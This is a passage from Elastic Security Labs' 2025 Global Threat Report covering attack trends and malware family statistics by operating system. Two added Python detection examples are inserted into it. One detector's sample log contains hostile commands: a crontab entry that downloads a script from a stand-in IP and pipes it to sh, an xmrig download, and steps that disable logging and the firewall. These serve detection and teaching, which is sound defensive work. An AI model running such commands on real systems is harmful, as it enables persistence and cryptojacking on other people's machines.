Table of contents
01 Introduction (p. 2)
02 Executive summary (p. 3)
03 Trends and correlations (p. 7)
04 (p. 37)
05 (p. 42)
06 (p. 48)
07 (p. 49)
Global Threat Report 2025
Elastic Security Labs

01 Introduction
The adversary's playbook has fundamentally changed. The era of slow, methodical intrusion has been replaced by a new model of high-velocity attacks that prioritizes speed and efficiency. Attackers are now exploiting the trusted tools and workflows of the modern enterprise—cloud accounts, developer platforms, and browsers—making their actions harder than ever to distinguish from normal activity.

The answer is hidden in your data. To spot today's high-speed attacks, you need an in-depth understanding of your environment. This means using AI-driven analysis to connect real-time events to historical patterns, revealing the full story of an attack. Only with this deep, machine-speed context can you make the quick, confident decisions needed to stop a modern threat.

Our team of researchers, analysts, and engineers at Elastic Security Labs believes that the only way to succeed is through an open, community-based approach—we all get stronger when we share what we learn. This report puts that belief into practice, sharing insights from our global visibility to help you build a stronger, more confident defense.
02 Executive summary
The age of patient, stealthy attacks is giving way to a new era of high-velocity threats. Our year-over-year analysis reveals a clear strategic shift: adversaries are retooling for speed, weaponizing AI to generate novel threats at scale, and prioritizing immediate execution over prolonged stealth. This acceleration forces defenders to adapt to an attack lifecycle measured in minutes, not months, where rapid, context-rich decisions drawn from both real-time and historical data have become the key to effective defense.

The 2025 Elastic Global Threat Report from Elastic Security Labs breaks down this new landscape. Based on our analysis of global threat telemetry, we've identified the key adversary behaviors and defensive innovations that matter most. Here's a preview of what you'll learn:

• Adversary priorities on Windows have flipped in the last year. The tactic category of Execution now accounts for 32.05% of malicious behavior—doubling its previous share of ~16%—and surpassing Defense Evasion as the top tactic. This disrupts a three-year trend and indicates a strategic shift toward immediate payload deployment over initial stealth.
What this means for you -> Attackers are no longer waiting to hide; they are focused on running malicious code immediately upon entry. This makes runtime memory protection and initial access prevention more critical than ever.

• The cloud attack surface is highly concentrated. Over 60% of all cloud security events boil down to just three adversary goals: Initial Access, Persistence, and Credential Access.
What this means for you -> Across all major cloud platforms, this laser focus on identity-based attacks is a clear signal that hardening authentication flows and monitoring for anomalous privileged access are the most effective ways to defend your cloud workloads.
• Adversaries are weaponizing AI to lower the barrier to entry for cybercrime. We saw a 15.5% increase in Generic threats, a trend likely fueled by adversaries using large language models (LLMs) to quickly generate simple but effective malicious loaders and tools.
What this means for you -> The rise of AI-generated threats dramatically increases the volume and variety of malware you face. This means relying less on static signatures and more on behavioral analytics and AI-driven detection to automatically identify and stop the flood of novel threats at scale.

• The theft of browser credentials has industrialized. Our analysis of over 150,000 malware samples revealed that more than 1 in 8 are designed to steal browser data. This isn't for isolated use; these credentials are the raw material fueling the access broker economy, providing a steady supply of keys for other attackers to compromise corporate cloud accounts.
What this means for you -> The browser is a primary battleground for your organization's most sensitive data. Infostealers have adapted to built-in browser protections, which means traditional identity controls are no longer enough.

• Source code leaks create uniquely permanent risks. As our internal investigations show, a single accidental commit to GitHub—from API keys to a passport photo—becomes part of a distributed, immutable history that is incredibly difficult to fully remediate, creating durable exposure from a momentary lapse.
What this means for you -> Continuous monitoring must extend beyond traditional perimeters and into your developer workflows to secure the entire supply chain ecosystem.

These trends are deeply interconnected. An adversary can use AI-generated malware to steal browser credentials, which are then used to gain initial access to a cloud account. Once inside, they immediately focus on execution to deploy ransomware or steal data. This report connects the dots, showing how these TTPs form the modern attack chain and, more importantly, how to break it at multiple points.

The threat landscape is complex, but by understanding malware and threat behaviors and leveraging advanced defenses, organizations can significantly improve their resilience. Elastic Security provides the necessary capabilities and shared intelligence to navigate these challenges and build a more secure digital future through collective efforts and continuous adaptation.
What's new in this report

Broader visibility into customer distribution: For the first time in this report, Elastic is providing the following summary of our enterprise customer distribution to help contextualize trends and correlations. The breakdown below depicts the 10 most prevalent categories of enterprise, which include a wide range of service-based businesses, financial services providers, utilities, and public sector organizations. Industry context matters because threat actors don't target every vertical the same way, and it is important to see risk through the lens of your, and adjacent, industry sectors. Tying threats to vertical realities helps provide a clear view of business impact.

Enterprise customer distribution by industry (share of count):
Technology Consulting Services: 27.3%
Other: 15.7%
Business Services: 12.5%
Civilian Agencies: 10.4%
Banking: 9.0%
Telecommunications: 6.4%
Other Professional Services: 6.2%
Software: 4.5%
Investment Management: 4.1%
Insurance: 3.9%
Comparison with hybrid sources: New this year, we provide subsections throughout the Trends and correlations section that describe our observations from hybrid public/private sources. Each vendor collects unique telemetry in the sense that our user and customer populations may not overlap across regions or industries. This comparison to hybrid sources serves as a transparent way to communicate that our visibility may not equate to the broader global threat landscape. It's a way of showing you that we understand the limits of our imperfect visibility, while also highlighting globally prevalent threats you might have encountered.

Insight into Elastic Security machine learning and AI: With this edition, we're also including information on Elastic Security Machine Learning and AI, including model performance and updates. These technologies play a pivotal role in defense-in-depth, often mitigating threats before they have an opportunity to impact enterprises.

Visibility into Elastic's internal threat data: As Elastic Security's customer zero, Elastic's internal information security team provides valuable perspectives about the threats we encounter from the global threat landscape. The case studies they contribute to this publication highlight that we have skin in the game, and we practice what we preach.

Sunset sections from previous reports: Finally, this edition of Elastic's Global Threat Report omits some sections from prior editions (such as forecasts and forecast rebuttals) and focuses on key statistics derived from the telemetry data our users and customers opt to share with us. It also provides insights into the work we're doing both to generate telemetry and prioritize new data or capabilities. Earlier in 2025, we released a companion report, The State of Detection Engineering at Elastic, which tells this story in much more detail. Let's see how we're changing together.
03 Trends and correlations
The following subsections describe the major tactics, techniques, and procedures (TTPs) employed by threats that were identified across Elastic telemetry from June 2024 to July 2025. Elastic telemetry includes data generated by Elastic Endgame, Elastic Endpoint, and the Elastic Security solution.¹ In some cases, the Elastic Security solution ingested data from third-party sensors and other technologies.
Malware signature key statistics

In this section, Elastic Security Labs studies the distribution and trends of malware families in 2025 across all our customers' platforms, comparing these findings with last year's results where applicable. This study includes all file and memory threats identified using our YARA rules, which are a set of strings or byte signatures that uniquely identify a specific threat or family. In line with our open source philosophy, we continue to share these rules on Elastic's Protections artifacts repository.
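The string-and-condition layout described above (a rule fires when enough of its strings or byte patterns appear in a file or in memory), as an added example that is not part of the report and not a rule from Elastic's protections-artifacts repository: a minimal YARA-style matcher applied to three constructed builds of an invented loader family. The rule name, the marker strings, the XOR key and the sample buffers are all assumptions made for this example. It shows why the report counts memory signatures alongside file signatures: the packed build hides every marker on disk and only matches once its body is decoded, and a rebuilt variant that keeps a single marker stays below the rule's threshold.

```python
"""A minimal YARA-style scanner over constructed on-disk and in-memory buffers.
Example code for this write-up, not a rule from Elastic's protections-artifacts
repository; the rule, marker strings and samples are invented."""
from dataclasses import dataclass


@dataclass
class Rule:
    name: str
    strings: dict      # identifier -> bytes, like YARA's $s1 = "..." / $h1 = { .. }
    min_matches: int   # the condition "<min_matches> of them"


# Hypothetical rule: every marker below is invented for the example.
LOADER_RULE = Rule(
    name="Example_Loader_Markers",
    strings={
        "$s1": b"/api/gate.php?ident=",
        "$s2": b"BEACON_CHECKIN_v2",
        "$s3": b"Software\\ExampleLoader\\Run",
        "$h1": bytes.fromhex("488D0DDEADBEEF"),   # a byte-pattern signature
    },
    min_matches=2,
)
XOR_KEY = 0x5A
STUB = b"MZ\x90\x00 stub: decode body with key 0x5A, then jump "


def matched_strings(rule, data):
    """Identifiers of the rule's strings that occur anywhere in data."""
    return sorted(sid for sid, pat in rule.strings.items() if pat in data)


def scan(rule, data):
    """(fired?, identifiers): the rule fires only when enough strings are present."""
    hits = matched_strings(rule, data)
    return len(hits) >= rule.min_matches, hits


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def build_samples():
    """Three constructed builds of the same invented family."""
    body = b"MZ\x90\x00 loader body " + b" ".join(LOADER_RULE.strings.values())
    packed = STUB + xor_bytes(body, XOR_KEY)        # all markers hidden on disk
    rebuilt = (b"MZ\x90\x00 rebuilt variant /v3/sync.php?id= SYNC_v3 "
               + LOADER_RULE.strings["$s3"])         # recompiled, one marker kept
    return {"plain": body, "packed": packed, "rebuilt": rebuilt}


def unpack(packed):
    """What the packed build does at run time: decode the body into memory,
    which is the buffer a memory signature scan sees."""
    return xor_bytes(packed[len(STUB):], XOR_KEY)


if __name__ == "__main__":
    samples = build_samples()
    for label, buf in samples.items():
        print(f"file scan  {label:8s}", scan(LOADER_RULE, buf))
    print("memory scan packed  ", scan(LOADER_RULE, unpack(samples["packed"])))
```

A real YARA condition can also test string counts, offsets and file structure; the threshold here is the minimal form of that, and it is the reason a recompiled variant that preserves one marker is a miss rather than a hit.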
Distribution of malware by operating system in Elastic telemetry

This section generalizes the malware signature events observed across supported operating systems, which presently include Windows, Linux, and macOS endpoints.

Windows: 89.97%
Linux: 9.00%
macOS: 1.03%

¹ The Elastic Security solution telemetry is generated by a diverse population of sensors and data sources that are too numerous to describe concisely, including sensors not developed by Elastic.
Windows summary

Out of all signature-related detections, 89.97% were recorded on Windows. This prevalence is largely due to the distribution of Windows among customer environments and an emphasis on Windows-based research to combat novel and widespread malware threats. The 23.85% increase in detections compared to last year can be attributed to the increase in Elastic Defend Windows-based adoption.

Linux summary

In this year's study, Linux systems accounted for 9% of signature detections, a notable decrease from the previous year. However, this does not suggest that Linux is less of a target. Given its primary use in server and application hosting, intrusions often involve advanced techniques like exploit kits and custom rootkits, as Elastic Security Labs detailed in its PUMAKIT research earlier this year. Such novel techniques are challenging to detect with YARA signatures, but they may be successfully identified by our agent using behavioral and machine learning-based methods.

macOS summary

macOS represents the smallest portion of our data at 1.03%, consistent with the previous year. While this percentage is low, attributed to both its lower adoption among our customers and a generally lower volume of malware targeting the platform, it does not imply that macOS is inherently more secure. Elastic Security's high level of coverage on this platform allowed us to uncover an advanced threat attack earlier this year, which we attribute to the Democratic People's Republic of Korea (DPRK).

Malware categories observed across all supported operating systems

Each file and memory signature we identify is categorized into distinct but subjectively defined groups. The distribution across these categories is outlined in the following table.
Trojan: 64.49%
Generic: 23.53%
Rootkit: 5.01%
Cryptominer: 2.77%
Remote Admin: 1.91%
Other: 2.29%
Trojan category

In this year's report, Trojans comprised 64.49% of all identified malware. These threats typically masquerade as legitimate software, allowing malicious actors to establish a foothold on compromised systems, exfiltrate sensitive data, deploy additional harmful payloads, and further penetrate network defenses. Elastic Security Labs maintains vigilance against such threats, documenting a ClickFix malware campaign that was actively employed to deliver these Trojan payloads earlier in the year.

Generic category

Generic threats, encompassing various small tools that couldn't be categorized elsewhere, account for 23.53% of all threats; this category saw a 15.5% increase from last year. This rise is possibly driven by the ease of creating such tools. Large language models (LLMs) enable even less-skilled adversaries to quickly generate reliable, simple loaders. Additionally, a climate of economic uncertainty often spurs an increase in cybercrime, leading to more diverse and widespread threat activity.

Rootkit category

Rootkits have shown a significant increase, reaching 5.01% in this year's study. Our ability to detect them has greatly improved, particularly on Linux, where many advanced threats leverage kernel-level features for stealth and privileged functionality to establish a deep foothold on infected machines. We conducted an in-depth analysis of a Windows rootkit and its capabilities that we refer to as ABYSSWORKER, also known as POORTRY by Google Cloud Mandiant, which was detected in the wild via our telemetry.
Cryptominer category

Cryptominers continue to pose a threat, accounting for 2.77% of the share. The majority are deployed to mine Monero cryptocurrency, primarily utilizing XMRig. This prevalence is likely due to Monero's privacy features. Additionally, unauthorized cryptomining on Linux has led to an increased research emphasis on these families.

Remote Monitoring and Management (RMM) category

Remote Monitoring and Management (RMM) tools, such as TeamViewer or UltraVNC, represent 1.91% of observed instances. These legitimate, free, or paid "support" tools are abused by threat actors to gain remote access to a victim's machine once the victim is tricked into installing them.

Malware families broken down by operating system in Elastic telemetry

This section provides the most prevalent malware families identified on each operating system. The designation "malware family" is applied to related code families that share significant design and implementation similarities, but which may be drastically different in terms of packaging or even translated to another development language. Prior editions of this report combined data from all operating systems, which influenced the reported distribution of these malicious code families. With this more detailed reporting, we hope to better represent these distributions. For each operating system, we highlight threat phenomena that might otherwise be overlooked and which are reflected in endpoint behavioral trends.

Windows-based malware families

Elastic telemetry captured a wide variety of signature events with few, if any, truly dominant code families. However, three general phenomena stand out: the explosion of infostealers, reliable off-the-shelf families, and malware from open sources.
Windows.Trojan.GhostPulse: 12.2%
Windows.Trojan.Remcos: 9.33%
Windows.Trojan.Asyncrat: 8.07%
Windows.Trojan.Bumblebee: 6.67%
Windows.Trojan.RedLineStealer: 6.67%
Windows.Trojan.Lumma: 6.67%
Windows.Trojan.Njrat: 5.33%
Windows.Trojan.Gh0st: 5.33%
Windows.Trojan.Guloader: 5.33%
Windows.Trojan.Stealc: 5.33%
Infostealers and the prevalence of access broker networks

GhostPulse represents about 12% of signature events and leverages built-in Windows scripting interfaces and process injection to deliver infostealers such as Lumma (6.67%) and RedLine (6.67%). Infostealers play a key role in collecting credentials that are packaged and sold by access brokers, which commoditizes initial access while frustrating attribution of initial access attempts.

Off-the-shelf frameworks

Remcos (9.33%) and Cobalt Strike (~2%) were two of the most frequently identified off-the-shelf malware families seen targeting the Windows operating system. These capabilities benefit from mature development teams and have been leveraged broadly by threats of all kinds to achieve a variety of objectives. While we have observed an overall reduction of off-the-shelf implants this year, we attribute that to the rapid popularity of other code families.

Open sources

AsyncRAT, Havoc, and njRAT collectively represent about 13% of signature events. What separates these code families from those developed privately is that these are available publicly on GitHub. The availability of source code lowers the barrier to entry for some threat groups and may inspire features in closed malware development ecosystems. Importantly, this also plays a powerful role in enabling defenders to produce countermeasures from those very same open sources.
Linux-based malware families

Linux telemetry shows a consistent threat landscape dominated by commoditized malware, cryptocurrency miners, and lightweight command-and-control (C2) frameworks. Adversaries continue to rely on well-known code families such as Sliver, Mythic, and Metasploit, often deployed after initial access via remote services or public-facing applications. These frameworks are typically used directly from the shell, indicating a hands-on intrusion style.
Linux.Trojan.Generic: 16.77%
Multi.Trojan.Sliver: 12.43%
Multi.Trojan.Mythic: 11.99%
Linux.Trojan.XZBackdoor: 10.60%
Linux.Trojan.Metasploit: 9.33%
Linux.Trojan.Gafgyt: 6.45%
Linux.Trojan.Pornoasset: 6.13%
Linux.Trojan.Getshell: 4.37%
Linux.Trojan.Mettle: 3.93%
Linux.Trojan.Dropper: 3.09%
Persistent patterns

A common attack methodology observed alongside signature event data begins with Initial Access, followed by rapid establishment of Persistence. Scheduled job mechanisms such as cron and systemd were most commonly abused, frequently triggering behavioral detections. Shell profile modification, XDG autostart desktop entries, and udev rules were also observed. Elastic Security Labs researcher Ruben Groenewoud has shared in-depth research into Linux persistence.

Off-the-shelf, on the wire

If the cloud is "someone else's computer", off-the-shelf capabilities are "someone else's malware." Threats of many kinds chose mature and well-built frameworks like Sliver (12.43%), Mythic (~12%), and Metasploit (9.39%) because they reduce the development burden while complicating attribution.
Cryptocurrency mining

Once persistence is established on Linux, adversaries commonly deploy cryptominers, particularly XMRig variants. These payloads are usually part of broader scripts that enumerate kernel features, remove competitors using kill commands, harden attacker files via chattr +i, and attempt to evade detection by disabling system logging, firewall rules, and other defenses. Attackers frequently reach out to external services to determine the host's public IP and often utilize BusyBox for compact utility execution. This common attack pattern is also observed in the overall behavioral telemetry.
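The chain described in the Linux persistence and cryptomining paragraphs above (persistence via cron or systemd, competitor kills, chattr +i, logging and firewall disabled, a public-IP lookup, BusyBox, then XMRig), written as behavioral correlation logic over a constructed process-execution log. This is an added example, not Elastic's own detection logic or endpoint rules; the host names, timestamps, command lines, the TEST-NET address 198.51.100.7, the pool hostname and the ATT&CK technique mapping are assumptions made for the example. A single indicator is not a verdict: the benign host that enables a service and checks its public IP is reported with its indicators but without the chain.

```python
"""Behavioral correlation of the Linux persistence -> cryptominer chain over a
constructed process-execution log. Example code, not Elastic's detection logic;
the ATT&CK technique mapping is this example's own reading of each behavior."""
import re
from collections import defaultdict

# indicator -> (ATT&CK tactic, technique, regex over the command line)
INDICATORS = {
    "cron_persistence":    ("Persistence", "T1053.003", r"\bcrontab\s+-|/etc/cron\.|/var/spool/cron"),
    "systemd_persistence": ("Persistence", "T1543.002", r"\bsystemctl\s+enable\b|/etc/systemd/system/\S+\.service"),
    "shell_profile":       ("Persistence", "T1546.004", r"\.bashrc\b|\.profile\b|/etc/profile\.d/"),
    "xdg_autostart":       ("Persistence", "T1547.013", r"\.config/autostart/"),
    "udev_rule":           ("Persistence", "T1546.017", r"/etc/udev/rules\.d/"),
    "kernel_enum":         ("Discovery", "T1082", r"\buname\s+-\w*r\b|\blsmod\b|/proc/(version|cpuinfo)\b"),
    "public_ip_lookup":    ("Discovery", "T1016", r"\b(curl|wget)\b.*\b(ifconfig\.me|icanhazip\.com|ipinfo\.io|api\.ipify\.org)\b"),
    "kill_competitors":    ("Defense Evasion", "-", r"\b(pkill|killall)\b.*\b(xmrig|minerd|kinsing|kdevtmpfsi)\b"),
    "chattr_immutable":    ("Defense Evasion", "T1222.002", r"\bchattr\s+\+i\b"),
    "disable_logging":     ("Defense Evasion", "T1562.001", r"\b(systemctl\s+stop|service)\s+(rsyslog|auditd|syslog)\b"),
    "clear_history":       ("Defense Evasion", "T1070.003", r"\bhistory\s+-c\b|HISTFILE=/dev/null|\bunset\s+HISTFILE\b"),
    "disable_firewall":    ("Defense Evasion", "T1562.004", r"\biptables\s+-F\b|\bufw\s+disable\b|\bsetenforce\s+0\b|\bsystemctl\s+(stop|disable)\s+firewalld\b"),
    "busybox_exec":        ("Execution", "T1059.004", r"\bbusybox\s+\w+"),
    "miner_exec":          ("Impact", "T1496", r"\bxmrig\b.*\s(-o|--url|--donate-level)\b|stratum\+(tcp|ssl)://"),
}
COMPILED = {name: re.compile(rx) for name, (_, _, rx) in INDICATORS.items()}

# Constructed events: (timestamp, host, user, command line). 198.51.100.7 is a
# documentation (TEST-NET-2) address; pool.example.net and the wallet are invented.
EVENTS = [
    ("2025-06-02T10:14:07Z", "web-01", "www-data", "uname -r; grep -c processor /proc/cpuinfo"),
    ("2025-06-02T10:14:09Z", "web-01", "www-data", "curl -s https://ifconfig.me"),
    ("2025-06-02T10:14:12Z", "web-01", "www-data", "pkill -9 -f kdevtmpfsi; pkill -9 -f kinsing"),
    ("2025-06-02T10:14:15Z", "web-01", "www-data",
     "(crontab -l 2>/dev/null; echo '*/10 * * * * curl -s http://198.51.100.7/x.sh | sh') | crontab -"),
    ("2025-06-02T10:14:18Z", "web-01", "www-data", "chattr +i /tmp/.x/xmrig /etc/cron.d/sysupdate"),
    ("2025-06-02T10:14:20Z", "web-01", "www-data", "systemctl stop rsyslog; iptables -F; setenforce 0"),
    ("2025-06-02T10:14:21Z", "web-01", "www-data", "export HISTFILE=/dev/null; history -c"),
    ("2025-06-02T10:14:25Z", "web-01", "www-data", "/tmp/.x/busybox wget -qO /tmp/.x/xmrig http://198.51.100.7/xmrig"),
    ("2025-06-02T10:14:31Z", "web-01", "www-data",
     "/tmp/.x/xmrig -o stratum+tcp://pool.example.net:3333 -u 44exampleWallet --donate-level 0 -B"),
    # Benign administration on another host: two indicators, no chain.
    ("2025-06-02T09:00:02Z", "db-02", "ops", "systemctl enable --now postgresql"),
    ("2025-06-02T09:05:40Z", "db-02", "ops", "curl -s https://ifconfig.me"),
    ("2025-06-02T09:06:11Z", "db-02", "ops", "apt-get install -y htop"),
]


def tag(cmd):
    """Indicators whose pattern occurs in a single command line."""
    return [name for name, rx in COMPILED.items() if rx.search(cmd)]


def correlate(events):
    """Per host: chronological, de-duplicated indicators and a verdict. The chain
    verdict needs a miner execution preceded by both a Persistence and a Defense
    Evasion indicator; anything less is reported without the chain."""
    seen = defaultdict(list)
    for _, host, _, cmd in sorted(events, key=lambda e: e[0]):
        for name in tag(cmd):
            if name not in seen[host]:
                seen[host].append(name)
    report = {}
    for host, names in seen.items():
        if "miner_exec" in names:
            before = {INDICATORS[n][0] for n in names[: names.index("miner_exec")]}
            verdict = ("cryptominer_chain"
                       if {"Persistence", "Defense Evasion"} <= before else "miner_only")
        else:
            verdict = "none"
        report[host] = {
            "verdict": verdict,
            "indicators": names,
            "techniques": [f"{INDICATORS[n][0]}/{INDICATORS[n][1]}" for n in names],
        }
    return report


if __name__ == "__main__":
    for host, result in correlate(EVENTS).items():
        print(host, result["verdict"], ", ".join(result["indicators"]))
```

Ordering matters in the verdict: the miner must come after persistence and evasion, which is the sequence the paragraph describes, so an administrator who enables a service or flushes a firewall rule without a miner following never reaches the chain verdict. The regexes are deliberately narrow illustrations; a production rule set would key on process ancestry and file writes rather than command-line text alone.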
macOS-based malware families

MacOS.Trojan.Metasploit: 25.66%
MacOS.Cryptominer.Generic: 17.70%
MacOS.Infostealer.MdQueryTCC: 13.27%
MacOS.Trojan.Adload: 10.62%
Macos.Infostealer.Wallets: 7.08%
Multi.Trojan.Sliver: 5.31%
MacOS.Cryptominer.Xmrig: 4.42%
Macos.Creddump.KeychainAccess: 3.54%
MacOS.Trojan.Thiefquest: 2.65%
MacOS.Trojan.Getshell: 2.65%
Other: 7.07%
Off-the-shelf malware

Although the low number of macOS observations makes the study of malware distribution on the platform inherently skewed, we observe that the most widespread family is Metasploit, with 25.66% of the share.

Cryptominers

Generically identified cryptominers (17.70%) and the well-known XMRig miner (4.42%) collectively represent about 22% of the malware we observed on macOS. Like Linux, macOS appears to be an attractive target for cryptocurrency mining.

Infostealers

Infostealers are a dominant category on all supported operating systems, with MdQueryTCC (13.27%) and Wallets (7.08%) making up about 20% of total macOS observations. Notably, this doesn't capture indirect or script-based infostealers—both of which played roles in novel discoveries, which are by definition minority events.
Endpoint behavior key statistics

Elastic Security operates on the principles of openness, transparency, and collaboration. In line with these values, Elastic shares all protections artifacts used in production, which detail the endpoint behavioral logic developed to identify adversary tradecraft using Elastic. This report leverages global telemetry from the alerts and integrated prevention capabilities derived from this detection logic. To the extent that tactics and techniques exist in MITRE ATT&CK